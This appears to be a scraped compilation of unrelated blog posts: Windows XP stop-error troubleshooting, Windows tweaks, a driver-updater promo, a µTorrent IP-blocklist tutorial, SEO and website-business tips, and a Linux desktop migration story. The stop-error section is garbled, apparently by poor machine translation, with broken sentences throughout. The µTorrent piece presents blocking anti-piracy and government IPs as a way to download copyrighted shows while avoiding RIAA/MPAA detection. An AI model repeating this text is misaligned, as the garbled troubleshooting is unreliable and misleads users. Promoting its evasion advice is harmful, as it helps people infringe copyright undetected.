- Message Stop 0 × 0000000A may appear after installing the driver, system service, or firmware is wrong. If the Stop message lists a driver, disable, remove, or roll back (restore the driver to a version that works well) the faulty driver. If you disable or delete the drivers solve the problem, contact the device manufacturer (hardware) is problematic for possible driver updates are available.
- This Stop message also may occur because of defective hardware or problems. If the Stop message indicates a particular category of devices (video or disk adapters, for example), try out or replace the hardware to determine if the correct hardware is the source of the problem.
- If you are experiencing this Stop message when updating Windows XP to sp1, 2, or 3, the possibility of problems due to an incompatible driver, system service, virus scanner, or backup. To prevent this, before you perform the update of Windows, your hardware configuration features a minimum, and remove all third-party drivers (additional) and system services (including antivirus). After the Windows update is complete, contact your hardware manufacturer to obtain compatible updates to the version service pack (sp) Windows XP PC.
- If you are not sure of the three messages above, try reset the BIOS settings you come back.


Message Stop 0 × 0000001E indicates that the Windows XP kernel detected an illegal or processor instructions that are not known. The cause of this Stop message 0 × 0000001E similar to the cause of the message Stop 0 × 0000000A, namely because of access violations and invalid memory. Usually error-handler (handler error) by default from Windows XP will overcome this problem if there are no error-handling routines in the instruction code is executed.

- Message Stop 0 × 0000001E generally occurs after installing a damaged driver or system service, or maybe there is a problem in hardware (such as memory and IRQ conflicts). If the Stop message lists a driver, disable, remove, or roll back (restore the driver to a version that works well) the faulty driver. If you disable or delete the drivers solve the problem, contact the device manufacturer (hardware) is problematic for possible driver updates are available.
- If the message include the Stop Win32k.sys file, the source of possible damage is the program "a remote-control" third-party. If similar programs were installed, you may be able to disable it through safe mode. If not, use Recovery Console to manually delete the file system service that causes the problem.
- Problems can also be caused by incompatible firmware. Most problems ACPI (Advanced Configuration and Power Interface) can be improved by updating with the latest firmware.
- Another possibility for disk space is not sufficient when installing an application or perform certain functions that require more memory. You can delete files that are not required to obtain disk space. Use Disk Cleanup to increase disk space. Through the Recovery Console, remove temporary files (files with the extensions. Tmp), files, Internet cache files, application backup files, and files. Tmp generated by Chkdsk.exe or Autochk.exe. You can also choose to install the application on another hard drive with more space or can also move data from a full hard drive to hard drive with more space.
- This Stop message also may be caused by a memory leak (memory leak) from the application or service that does not release memory correctly. Poolmon (Poolmon.exe) to help you isolate the components that kernel memory leak. For more information about the handling of memory leaks see Microsoft Knowledgebase article Q177415 ( "How to Use Poolmon to Troubleshoot Kernel memory leaks" and Q298102 ( .com/kb/298102): "Finding Pool Tags Used by Third Party Files Without Using the Debugger".

3. Stop 0×00000024 or NTFS_FILE_SYSTEM
Message Stop 0 × 00000024 indicates that there is a problem in Ntfs.sys (driver file that allows the system to read and write to NTFS file system drives). Similar Stop message, 0 × 00000023, indicates there is a problem in the file system FAT16 or FAT32 (File Allocation Table).

- SCSI hardware malfunctions and ATA (Advanced Technology Attachment) or the driver may also affect the system's ability to read and write to the disk and cause errors. If using a SCSI hard drive, check cables and the problem stops (termination problem) between the SCSI controller and disk. Periodically check Event Viewer for error messages related to SCSI or FASTFAT in the System log or Application log in Autochk (Right click on My Computer, choose Manage, in the Computer Management - System Tools, select Event Viewer).
- Check the tool you normally use to monitor your system constantly (such as antivirus, backup programs, or the Disk Defragmenter program) is already compatible with Windows XP. Some disk or adapter is bundled with diagnostic software that you can use to test hardware.

The way to test hard disk or volume integrity:
Method 1:
1. Open a command prompt (Start - Run - type cmd)
2. Run the Chkdsk tool, which will detect and attempt to resolve the structure of the corrupted system files, by typing in the command prompt: chkdsk drive: / f

Method 2:
1. Double-click My Computer and select the disk you want checked.
2. On the File menu, select Properties.
3. Select the Tools tab.
4. On the Error-checking box, click Check Now.
5. In Check disk options, check the Scan for and attempt recovery of bad sectors. Option Automatically fix file system errors can also be checked.

If the volume you select is in use, a message will appear and ask whether to delay disk error checking until you restart the computer. After the restart, disk error checking runs and the volume being checked will not be used during the process. If you can not restart the computer because of an error, use safe mode or Recovery Console.

If you are not using the NTFS file system, and the system partition is formatted with the FAT16 file systems or FAT32 (File Allocation Table), the information LFN (Long File Name) can be lost if hard disk tools through a command prompt running MS-DOS. Command prompt that appears when using a startup floppy disk or when using the command prompt option in the boot multiple systems that use FAT16 or FAT32 partitions with Microsoft Windows 95 OEM Service Release 2 (OSR2), Microsoft Windows 98, or Microsoft Windows Millennium Edition (Me) which installed. Do not use tools other operating systems to Windows XP partition.

- Nonpaged pool memory might be depleted which can cause the system to stop. You can solve this problem by adding RAM, which will increase the quantity of nonpaged pool memory available to the kernel.

Computer Tips and Tricks: System Tweaks

Disable System Restore

You can gain a lot of drive space by disabling System Restore. (You should already have a backup regimen in place before you do this.) In Vista, right-click My Computer, select Advanced system settings, click the System Protection tab, and uncheck any drives. In XP, right-click My Computer, then under System Tasks, click on "View system information." Click on the System Restore tab and click the box next to "Turn off System Restore on all drives" to disable it.

Configure Windows Update

Windows Update is great, but if it's set on autopilot, it will download updates that require a reboot, then pester you forever to install them, and eventually reboot on its own. Change the Windows Update settings (in the Windows Security section of the Control Panel) to download updates but ask you whether to install them.

Disable Delete Confirmation

You can disable the confirmation that pops up whenever you delete something by right-clicking the Recycle Bin and selecting Properties. Uncheck the delete confirmation box, click Apply and then OK, and you're done. Also, you can bypass the Recycle Bin entirely by holding down the Shift key while deleting files.

Disable Windows Animations

Sliding Window animations look cool, but you can improve system performance by disabling them completely. Right-click My Computer and go to Properties. In Vista, select Advanced system settings, or click the Advanced tab in XP. Click Settings in the performance box and uncheck any box that says animate, slide, or fade.

Create a Custom Toolbar

If you're constantly accessing a particular folder, you can add it to your taskbar for quick access. Right-click the taskbar and scroll to Toolbars, then select New Toolbar. It will open an Explorer window, so browse to your folder and select it. It's also handy to add My Computer as a toolbar.

Driver Checker 2.7.4

New Manage Your Windows Drivers with Ease. Driver Checker allows you to easily detect and update the latest drivers for your entire hardware devices. It can also back up the existing drivers and restore the drivers in case that you needed to reinstall or upgrade your operating system. Driver Checker provides an easy-to-use interface through which only a few clicks can make your jobs completely done with ease.

Key Features and Benefits of Driver Checker:

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Automatically update and maintain these drivers: Printer Drivers, USB Drivers, Sound/Audio Drivers, Vista Drivers, Bluetooth Drivers, Mouse Drivers, Keyboard Drivers, RAID Drivers, Scanner Drivers, Video Drivers, Modem Drivers, Network Drivers, Linksys Drivers, Webcam Drivers, Graphic Drivers, VGA Drivers and OtherWindows Drivers!




Protecting Yourself When Downloading Using µTorrent

If you've been using BitTorrent to download any of the more popular files, such as the latest episode of some major TV show, you may have found yourself receiving lots of "Wasted" data. This is data that has been discarded after being deemed corrupt or invalid by your BitTorrent client. Every so often, you will have received more wasted data than the size of the files you are downloading!

This is happening because Anti-P2P organizations are actively polluting P2P networks with fake peers, which send out fake or corrupt data in order to waste bandwidth and slow down file transfers. At its worst, when downloading major copyrighted torrents, as much as a fourth of the peers you are connected to can be attributed to various Anti-P2P agencies. There is also a much more serious side to this. Once you've established a connection to one of these fake "peers", your IP has been logged and will most likely be sent to the RIAA/MPAA!
But there is a way to fight back! If you are using the latest µTorrent (1.5), you can employ a little known feature called IP filtering. The author of µTorrent has gone out of his way to hide it, but it's there nonetheless.

But before we can activate this filter, we need to retrieve a list of currently known Anti-P2P organization IPs.
This is most easily done by downloading the latest blacklist from Bluetack (the same people who wrote SafePeer for the Azureus BT client) at This list is updated daily, and contains all known Anti-P2P organizations, trackers and peers, aswell as all known Goverment/Military IP addresses as collected by the Bluetack team. Once downloaded, extract and rename the file original filename "ipfilter.dat" to "ipfilter.dat" in preparation for the final step.

Paranoid pipfilter.dat.gz
Description: This list is all the blacklists bluetack makes put into a .dat.gz file for emule, now this will block some isp and also alot of things one may not think needed. Use at your own risk. This will have to be unzipped and then replace the .dat file manualy, in the config folder.
Version: Filesize: 0 bytes
Added on: 29-Apr-2005 Downloads: 39034
rename to "ipfilter.dat"
security related:

To make the list available to µTorrent, you need to place the renamed ipfilter.dat file in %AppData%\uTorrent. Go to Start -> Run and type %AppData%\uTorrent at the box. Click Ok button and a folder will appear.

After placing the ipfilter.dat in this folder, start µTorrent and go into preferences (Ctrl+P), then click on "Advanced". In the right hand pane, make sure that "ipfilter.enable" is set to true, and then close the dialog. That's it for the configuration.

You can verify that the list has been loaded by looking under the "Logging" tab of µTorrent, where you should see the line "Loaded ipfilter.dat (X entries)".

Congratulations! You are now protected against most of the garbage-distributing peers; and the likelyhood of the RIAA or MPAA knocking at your door has been substantially reduced! I'd go as far as to say that you shouldn't be using µTorrent at all without this feature turned on! And even if the law enforcement side of it doesn't bother you, you should still be interested in reducing the amount of garbage data that gets sent your way, which in turn leads to quicker downloads, and isn't that something everybody should strive for?

Making Your Website Into a Business Opportunity

How is internet marketing business helping people earn great income and take it as their primary business? Today people are interested in making fast and easy money which is not impossible. If you can put in some effort in the start then your internet marketing business can help you earn money easily and quickly.

Online business is a new form of conducting business, in this business a person cannot actually see or talk to his customers but has to convince him through written words only. Therefore having a website to promote your business online is indispensible. With so many website development companies available online it is very difficult to predict which one of them will satisfy your needs. Every company has its own way of creating a website design and uses its own special technique to promote your website against masses.

With a proper website design you can approach your customers professionally. Many people today create blogs to spread awareness about their brand amongst people but it is not enough. You audience must know where they can read more detail about your product and where it can be purchased. Sometimes an interested customer may not be able to purchase things without proper knowledge of the sales page. A web designing company offers you a base which is similar to an offline office and lets your customer reach you easily.

So when creating your website, it is important that you know your needs beforehand. There are some companies that provide great shopping offers to customers. They sell products of various brands due to which they require website with 70-80 pages. This is not required by every company. If you have just started your online business then you must choose a simple website, a website with essential links and pages. When you approach a web development company, they make sure that your products are described in a convincing way to excite the customer to purchase them. Having a sales page in your website is must. With the help of a sales page your customers can purchase the products anytime of the day or night.

A novice internet marketer may not have much knowledge as what to include in his website and what not. You do not have to fill your website with web pages but must use minimal amount of pictures to accentuate your product. A good website is one that details all positives and benefits of a product, a website that describes the product decently without exaggerating it. It is very important that you promise your customer only as much you can deliver. Fake promises can bring you more customers for some time but will not be profitable in the long run.

Web development companies offer you a great start by creating a website which is unique and easy to use and lets you achieve the kind of profit you dream of attaining from it. There are many website design Sydney companies that are known for its wonderful design and development services.

Five Tips, Tricks, and Techniques Search Engine Optimization

The phrase Search Engine Optimization (SEO) gets passed around like a worn one-dollar note in the competitive Internet marketplace. Gurus will be quick to point a finger at you as a nobody if you are not ranking for high valued keywords. While that last statement is not entirely true, it is feasible to be earning money by other means and SEO is among the most essential parts of an online campaign. Without SEO you will be throwing considerable amounts of cash down a rat hole. It's important that you do not become the marketer that's always chasing what "could have been." Instead, apply SEO disciplines and principles to your online business and see the profits roll in. By applying the following five principles to your online business will help you attain a top ranking in Google, Yahoo, and other search engines. This will save you time and create a massive amount of marketing muscle to expand your online income.

1. Choose keywords prudently
Become the master online marketer you want to be by picking the correct niche and it will pay off handsomely once you begin marketing. It is a waste of time to compete in a crowded and non-lucrative niche. The old adage says "crowds go where the money is" but this is not always true. People are sometimes too slow to see their advertising dollars going down the drain because big dumb money may rests in a specific niche. Conduct a complete investigation when deciding upon which niche to enter. Time spent here will benefit you later.

2. Start your own email list and stay in contact
The greatest asset online is a customer list. You may have heard it before that the money is in the list. It is the list that will sustain your future enterprise. All to often, list building gets passed over by amateur marketers. Building a massive list is common sense for major online marketers. You should build your list through opt-in forms located on your website. At the very least, get their first name and good email address so you can personalize your email communication. Use this list to introduce your products. Stay in constant contact with your list but never abuse your list with spammy offers. Create real value and a positive relationship by sending news worthy content to your customer list as often as possible. Treat your customers the way you would want to be treated. Do this and you will build a loyal following and will generate back links to your website through word-of-mouth which will increase your search engine rankings.

3. Add your keywords in post-writing
Nothing is more challenging than trying to create article content for SEO right from the start. It's not something you want to spend a lot of time doing. Using that method will ultimately compromise the quality of your labor. Never impede your creative writing ability by thinking only in terms of SEO content. Instead, write an article with a broad topic in mind and later add keywords to it where appropriate. You will produce high quality SEO content by using this method.

4. Pick your products carefully
Not all that glitters is gold. Weight the good with the bad when deciding which affiliate program to promote. Some affiliate content maybe outdated or may have never worked when it was released to the public. Be carefull and only pick affiliate products that have obvious and proven benefits that can be demonstrated how well they work. Go beyond the earnings screenshots for evidence that it works. Since your name and reputation are at stake, proper due diligence is advised when selecting an affiliate program to promote.

5. Give it enough time to work
You will not attain a top search engine ranking in one week. Don't attempt to hurry things along but do give your SEO efforts the time and consideration it deserves to achieve maximum success. Build your SEO strategy and always use quality content. Do not compromise your long-term strategy by experimenting with untested marketing strategies. In order to accomplish your goal of online success you must stay on course.

Journey To A Linux Desktop

As the holidays approach and we wind down to the end of the year, we all tend to look back on our accomplishments. This year, I am reminded that I am approaching the one-year anniversary of my move to a Linux desktop. For those of you who really want to learn Linux, I hope my experiences will help you take the plunge in 2010!

What prompted my move: I needed a more powerful laptop. I had my personal laptop configured as a dual-boot machine ever since Novell bought SUSE. Dual-boot is fine, but in my haste to get things done, I would inevitably drop back to Windows ... and that just wasn't working out well. Time to dig in, work through the issues, and find new, powerful applications that ran on Linux.

The hardware: Last year's holiday season yielded some great deals. While I could have bought a new system with Linux installed so that driver availability would be guaranteed, I decided to take a gamble and buy a Dell Studio 15 off the shelf at Staples and work through any driver issues I might encounter. This unit has a 64 bit processor, a 320G hard drive, and 4G of RAM.

Driver issues: While SUSE Linux Enterprise Desktop 10 SP 2 ships with a great many drivers (including loads of printer drivers), I had two problematic pieces off hardware: the ATI graphics card and the Broadcom wireless card. After lots of searching, I finally found the best answers for my issues at If you go the Ubuntu route as many people do, the Ubuntu forums will be your best resources.

* For information on how to install Broadcom wireless drivers on SUSE please see:

* For information on dealing with ATI's graphics cards, please see:

* For a list of models and hardware compatible with SUSE, please see: or

Software replacement: One of the main reasons people avoid moving to Linux is that many pieces of commercially-available software are written only for Windows. There has been more movement to write for the Mac, but Linux support can lag behind. Enter the open source community. I found some great replacements for software I use regularly ... and some of it actually works better than the Windows versions I had been using! Here are just a few of the applications I am currently running:

* Office Productivity Suite: If you have not looked at OpenOffice recently, you should definitely take some time to explore! The 3.0 version is greatly improved. I have been able to do most of what I need with OpenOffice, and actually like the Calc program better than Excel. SUSE also comes with Acrobat Reader and Planner (a project management program) already installed.

* Photo Editing: Gimp is included with SLED and does everything I would have used Paint for, and more.

* Diagrams: For the more advanced Visio functions, check out Dia. If you just need to do a flowchart or some other simple diagrams, I recommend using Draw in OpenOffice.

* Multifunction Printer Software: HP has some great tools included with their Officejet All-in-One printer/scanner/copier/fax machines. While I found the printer drivers for my unit (a 7410) included with SLED, I really wanted some of the more advanced functions (for example, scan to PDF) that I had on Windows. Enter the HP Toolbox found at When this program installs, it uses xsane for scanning documents to image files for PDF. I got all of the functions I needed ... plus, I no longer get those annoying update messages from Windows!

* Broadband Wireless: OK, I know this is actually hardware, but when I migrated I could not find a version of Verizon's VZAccess Manager to connect the card. After a bit of digging, I found that I could configure the card as a modem (which it is) and use Kinternet as my dialer. Quick and simple and no need to install more software. A quick search at should get you the answers you need for your card. If not, instead of putting in the card name, try searching on "EVDO card."

As I mentioned at the beginning of this article, I have been working with this laptop since last December and absolutely love it. The only way to truly learn Linux is to work with it every day. If you are bored over your Christmas break and want to play, give Linux a try. I will never go back!


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